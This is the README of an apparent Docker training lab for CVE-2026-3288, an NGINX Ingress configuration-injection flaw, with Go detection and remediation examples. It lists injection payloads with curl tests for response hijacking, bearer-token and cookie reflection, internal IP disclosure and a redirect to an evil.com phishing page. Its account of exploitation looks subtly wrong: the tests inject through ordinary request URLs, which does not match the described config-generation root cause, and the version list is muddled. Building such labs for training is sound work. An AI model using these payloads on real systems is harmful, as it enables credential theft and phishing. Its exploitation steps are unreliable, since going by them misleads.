# CVE-2026-3288 Vulnerable Lab (Docker)
## NGINX Ingress Controller Configuration Injection
⚠️ **WARNING**: This lab contains intentionally vulnerable configurations for **AUTHORIZED SECURITY TRAINING ONLY**
## Vulnerability Overview
**CVE-2026-3288** (CVSS 8.8 HIGH) - Configuration injection in NGINX Ingress Controller
- **Affected Versions**: < v1.13.8, v1.14.4, v1.15.0
- **Attack Vector**: Double-quote (`"`) injection in path configuration
- **Impact**: Remote Code Execution, Secret Disclosure, Credential Theft
- **Related**: CVE-2026-24512 (similar path injection)
### Root Cause
The `buildProxyPass()` function does not sanitize path input before interpolating it into nginx configuration, allowing attackers to break out of quoted strings and inject arbitrary nginx directives.
## Lab Components
```
CVE-2026-3288-lab/
├── README.md                      # This file
├── docker-compose.yml             # Main lab setup
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile             # Vulnerable NGINX setup
│   │   ├── nginx.conf             # Base configuration
│   │   └── vulnerable-config.conf # Vulnerable path handling
│   └── backend/
│       ├── Dockerfile             # Simple backend app
│       └── app.py                 # Flask application
├── exploits/
│   ├── exploit.py                 # Automated exploitation script
│   ├── payloads.txt               # Collection of exploit payloads
│   └── test-exploits.sh           # Test all exploits
├── detection/
│   └── monitor-logs.sh            # Monitor for exploitation attempts
└── cleanup/
    └── cleanup.sh                 # Remove all lab resources
```
## Prerequisites
- Docker installed
- Docker Compose installed
- Python 3.6+ (for exploitation scripts)
- curl or wget
- 2GB RAM minimum
## Quick Start
### 1. Start the Lab
```bash
cd CVE-2026-3288-lab
# Start vulnerable environment
docker-compose up -d
# Check status
docker-compose ps
```
### 2. Verify Installation
```bash
# Test backend is running
curl http://localhost:8080/
# Test NGINX is running
curl http://localhost/
```
### 3. Run Exploits
```bash
cd exploits
# Automated exploitation
python3 exploit.py --all
# Or test individual exploits
bash test-exploits.sh
```
### 4. Monitor Logs
```bash
# Watch NGINX logs for exploitation
docker-compose logs -f nginx
# Monitor detection
cd detection
bash monitor-logs.sh
```
### 5. Cleanup
```bash
docker-compose down -v
```
## Attack Scenarios
### Scenario 1: Response Hijacking
Inject nginx `return` directive to serve attacker-controlled content.
**Payload:**
```
/api" return 200 "HACKED BY ATTACKER
```
**Test:**
```bash
curl 'http://localhost/api" return 200 "HACKED'
```
### Scenario 2: Credential Theft
Reflect Authorization headers back in response to steal Bearer tokens.
**Payload:**
```
/login" return 200 "Token: $http_authorization
```
**Test:**
```bash
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'
```
### Scenario 3: Phishing Redirect
Redirect users to attacker-controlled phishing site.
**Payload:**
```
/" return 302 "https://evil.com/phishing
```
**Test:**
```bash
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'
```
### Scenario 4: Internal IP Disclosure
Leak internal server information.
**Payload:**
```
/" return 200 "Internal IP: $server_addr
```
**Test:**
```bash
curl 'http://localhost/" return 200 "Internal IP: $server_addr'
```
### Scenario 5: Cookie Theft
Steal session cookies.
**Payload:**
```
/" return 200 "Cookies: $http_cookie
```
**Test:**
```bash
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'
```
## How It Works
### Vulnerable Code Pattern
```nginx
# Vulnerable configuration
location ~ "^/api" {
rewrite "(?i)/api" /backend break;
proxy_pass http://backend;
}
```
### Exploitation
When the path contains a `"`, it terminates the quoted string early and the remainder of the path is parsed as nginx configuration:
```nginx
# Attacker input: /api" return 200 "HACKED
# Results in:
location ~ "^/api" return 200 "HACKED" {
# Original config is now broken
}
```
## Detection
### Log Monitoring
```bash
# Watch for suspicious patterns
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'
```
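The grep above matches on a literal `"`, but nginx's default access-log escaping writes a quote in `$request` as `\x22`, and clients may send it percent-encoded as `%22`. The following is an added detection example, not part of the lab: it undoes both encodings before applying the rule. The log lines are constructed samples in the `combined` format and the directive keyword list is an assumption.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strconv"
	"strings"
)

var (
	// Constructed sample lines in nginx "combined" log format (not taken from the lab).
	sampleLog = []string{
		`172.18.0.1 - - [10/Mar/2026:12:00:00 +0000] "GET /api/users HTTP/1.1" 200 512 "-" "curl/8.5.0"`,
		`172.18.0.1 - - [10/Mar/2026:12:00:01 +0000] "GET /api\x22 return 200 \x22HACKED HTTP/1.1" 200 6 "-" "curl/8.5.0"`,
		`172.18.0.1 - - [10/Mar/2026:12:00:02 +0000] "GET /login%22%20return%20200%20%22Token HTTP/1.1" 200 6 "-" "curl/8.5.0"`,
	}
	requestField = regexp.MustCompile(`\] "(.*)" \d{3} `) // the quoted "$request" field
	// nginx's default log escaping writes `"` as \x22 and `\` as \x5C, so a grep for a literal quote misses them
	hexEscape = regexp.MustCompile(`\\x([0-9A-Fa-f]{2})`)
	directive = regexp.MustCompile(`\b(return|rewrite|set|proxy_pass|include)\b`)
)

// isInjectionAttempt flags a line whose request path contains a `"` followed by an
// nginx directive keyword, after undoing log escaping and URL percent-encoding.
func isInjectionAttempt(line string) bool {
	m := requestField.FindStringSubmatch(line)
	if m == nil {
		return false
	}
	req := hexEscape.ReplaceAllStringFunc(m[1], func(h string) string {
		v, _ := strconv.ParseUint(h[2:], 16, 8)
		return string(rune(v))
	})
	path := req // METHOD path HTTP/x.y; a raw-quote payload may also contain spaces
	if f, l := strings.IndexByte(req, ' '), strings.LastIndexByte(req, ' '); l > f {
		path = req[f+1 : l]
	}
	if dec, err := url.PathUnescape(path); err == nil {
		path = dec
	}
	i := strings.IndexByte(path, '"')
	return i >= 0 && directive.MatchString(path[i:])
}

func main() {
	for _, l := range sampleLog {
		fmt.Println(isInjectionAttempt(l), l)
	}
}
```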
### Manual Detection
```bash
# Check NGINX config for injected directives
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"
```
## Remediation
### Immediate Actions
1. **Input Validation** - Sanitize all path inputs
2. **Escape Special Characters** - Properly escape `"` and `\`
3. **Use Allowlists** - Only permit known-good paths
4. **Monitor Logs** - Alert on suspicious patterns
### Code Fix
```go
// Before (vulnerable)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)
// After (fixed)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)
```
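As an added example (not the lab's or ingress-nginx's own code), one way to realise the `sanitizeQuotedRegex` step above: an allowlist check, assumed here to be stricter than what ingress-nginx permits since it rejects regex paths, followed by escaping of `"` and `\`, with the vulnerable `Sprintf` kept beside it so the string break shown under How It Works can be compared with the fixed output. All names other than those on the page are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

var (
	// Allowlist for Ingress paths: slash-separated segments of letters, digits and . _ ~ - only.
	// Quotes, backslashes, whitespace, semicolons and braces are deliberately absent (assumption: stricter than ingress-nginx).
	safePath      = regexp.MustCompile(`^/[A-Za-z0-9/._~-]*$`)
	ErrUnsafePath = errors.New("path contains characters not permitted in nginx configuration")
)

// validatePath is remediation step 3 (allowlist).
func validatePath(path string) error {
	if !safePath.MatchString(path) {
		return ErrUnsafePath
	}
	return nil
}

// escapeQuoted is remediation step 2 (defence in depth): inside an nginx double-quoted
// string, `\` and `"` must be backslash-escaped; backslash first so a quote's escape is not doubled.
func escapeQuoted(s string) string {
	s = strings.ReplaceAll(s, `\`, `\\`)
	return strings.ReplaceAll(s, `"`, `\"`)
}

// buildRewrite is the README's "After (fixed)" line, with sanitizeQuotedRegex realised as validate-then-escape.
func buildRewrite(path, target string) (string, error) {
	if err := validatePath(path); err != nil {
		return "", err
	}
	return fmt.Sprintf(`rewrite "(?i)%s" %s break;`, escapeQuoted(path), target), nil
}

// buildRewriteUnsafe is the "Before (vulnerable)" pattern, kept only for comparison.
func buildRewriteUnsafe(path, target string) string {
	return fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)
}

func main() {
	for _, p := range []string{"/api", `/api" return 200 "HACKED`} {
		fmt.Println("before:", buildRewriteUnsafe(p, "/backend"))
		cfg, err := buildRewrite(p, "/backend")
		fmt.Printf("after : %q err=%v\n", cfg, err)
	}
}
```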
## Learning Objectives
After completing this lab, you will understand:
1. ✅ How configuration injection vulnerabilities work
2. ✅ The impact of insufficient input sanitization
3. ✅ Multiple exploitation techniques
4. ✅ Detection methods via log analysis
5. ✅ Proper remediation strategies
## Troubleshooting
### Containers won't start
```bash
# Check logs
docker-compose logs
# Restart
docker-compose restart
```
### Port already in use
```bash
# Change ports in docker-compose.yml
# Or stop conflicting services
sudo lsof -i :80
```
### Exploits not working
```bash
# Verify NGINX is running
docker-compose ps nginx
# Check NGINX config
docker exec cve-2026-3288-nginx nginx -t
```
## Security Notice
- ⚠️ **ONLY** use in isolated lab environments
- ⚠️ **NEVER** deploy on production systems
- ⚠️ **NEVER** expose to the internet
- ⚠️ Ensure proper authorization before testing
- ⚠️ Follow responsible disclosure practices
## References
- [CVE-2026-3288 Advisory](https://github.com/kubernetes/ingress-nginx/security/advisories)
- [Fix PR #14667](https://github.com/kubernetes/ingress-nginx/pull/14667)
- [Sysdig Analysis](https://www.sysdig.com/blog/detecting-cve-2026-3288)
---
**Created for authorized security training and research purposes only**